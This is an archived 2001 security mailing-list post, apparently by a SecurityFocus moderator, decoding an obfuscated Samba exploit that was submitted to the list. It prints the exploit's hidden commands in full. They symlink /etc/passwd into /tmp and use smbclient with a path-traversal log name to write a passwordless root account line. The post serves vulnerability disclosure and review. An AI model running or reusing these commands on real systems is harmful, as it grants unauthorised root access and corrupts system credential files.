Samba Exploit Code

From: Dave Ahmad (daat_private)
Date: Thu Oct 25 2001 - 20:33:23 PDT

Next message: Martins, Luciano (AR - Buenos Aires): "Invalid RDP Data DoS code"

Previous message: gabriel maggiotti: "samba root exploit in RedHat"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hey,

There is some confusion about the Samba exploit.  It is an obfuscated
exploit for an old vulnerability in the Samba daemon.  Before approving it
to the list, I checked it.

The system() calls:

system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

Try this:

printf("%s\n%s\n%s\n",inject1,inject2,inject3a);

output:

/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"

fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N

I am not sure why they chose to write the exploit this way.

Regards,

Dave Ahmad
SecurityFocus
www.securityfocus.com

Next message: Martins, Luciano (AR - Buenos Aires): "Invalid RDP Data DoS code"
Previous message: gabriel maggiotti: "samba root exploit in RedHat"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 20:40:18 PDT